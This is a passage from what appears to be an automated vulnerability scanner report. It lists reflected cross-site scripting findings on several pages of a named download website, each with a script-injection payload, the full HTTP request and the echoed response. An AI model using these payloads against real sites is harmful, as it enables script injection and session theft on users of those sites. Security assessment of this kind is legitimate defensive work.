User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.htmlb4bea"><script>alert(1)</script>99c6425b343" />
...[SNIP]...

4.1810. http://www.x64bitdownload.com/linktous.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe20"><script>alert(1)</script>73a79dc6461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1" />
...[SNIP]...

4.1811. http://www.x64bitdownload.com/login.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/login.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90208"><script>alert(1)</script>513c51908fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.html90208"><script>alert(1)</script>513c51908fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/login.html90208"><script>alert(1)</script>513c51908fe" />
...[SNIP]...

4.1812. http://www.x64bitdownload.com/new-reviews.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d8f"><script>alert(1)</script>0e3502762a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:28:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9" />
...[SNIP]...

4.1813. http://www.x64bitdownload.com/new-reviews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabf"><script>alert(1)</script>0fd7b226cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:17 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1" />
...[SNIP]...

4.1814. http://www.x64bitdownload.com/new-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a3ba"><script>alert(1)</script>991a789ffdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html7a3ba"><script>alert(1)</script>991a789ffdb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html7a3ba"><script>alert(1)</script>991a789ffdb" />
...[SNIP]...

4.1815. http://www.x64bitdownload.com/new-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6b9"><script>alert(1)</script>0bb8bbb0810 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1" />
...[SNIP]...

4.1816. http://www.x64bitdownload.com/ratestars.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/ratestars.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98f8"><script>alert(1)</script>4fb8449076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076" />
...[SNIP]...

4.1817. http://www.x64bitdownload.com/ratestars.html [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/ratestars.html

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc10"><script>alert(1)</script>171150b91a2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: nocache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5" />
...[SNIP]...

4.1818. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/rss/downloads.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1476"><script>alert(1)</script>9457535a8e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml" />
...[SNIP]...

4.1819. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/rss/downloads.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a07"><script>alert(1)</script>79728d417c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5" />
...[SNIP]...

4.1820. http://www.x64bitdownload.com/saved-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21945"><script>alert(1)</script>5b51a8a7029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html21945"><script>alert(1)</script>5b51a8a7029 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html21945"><script>alert(1)</script>5b51a8a7029" />
...[SNIP]...

4.1821. http://www.x64bitdownload.com/saved-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955f"><script>alert(1)</script>40eb90fe594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1" />
...[SNIP]...

4.1822. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b5b"><script>alert(1)</script>17473a35adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html" />
...[SNIP]...

4.1823. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68784"><script>alert(1)</script>91cdfef4f9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/68784"><script>alert(1)</script>91cdfef4f9f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/68784"><script>alert(1)</script>91cdfef4f9f" />
...[SNIP]...

4.1824. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2bd"><script>alert(1)</script>bad4adca0ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html" />
...[SNIP]...

4.1825. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a532"><script>alert(1)</script>a50852b0f49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/4a532"><script>alert(1)</script>a50852b0f49 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/4a532"><script>alert(1)</script>a50852b0f49" />
...[SNIP]...

4.1826. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d9b4"><script>alert(1)</script>4af4e68853c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

4.1827. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e3a"><script>alert(1)</script>f98dca8ff54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/98e3a"><script>alert(1)</script>f98dca8ff54 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/98e3a"><script>alert(1)</script>f98dca8ff54" />
...[SNIP]...

4.1828. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54c84"><script>alert(1)</script>b177d980758 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
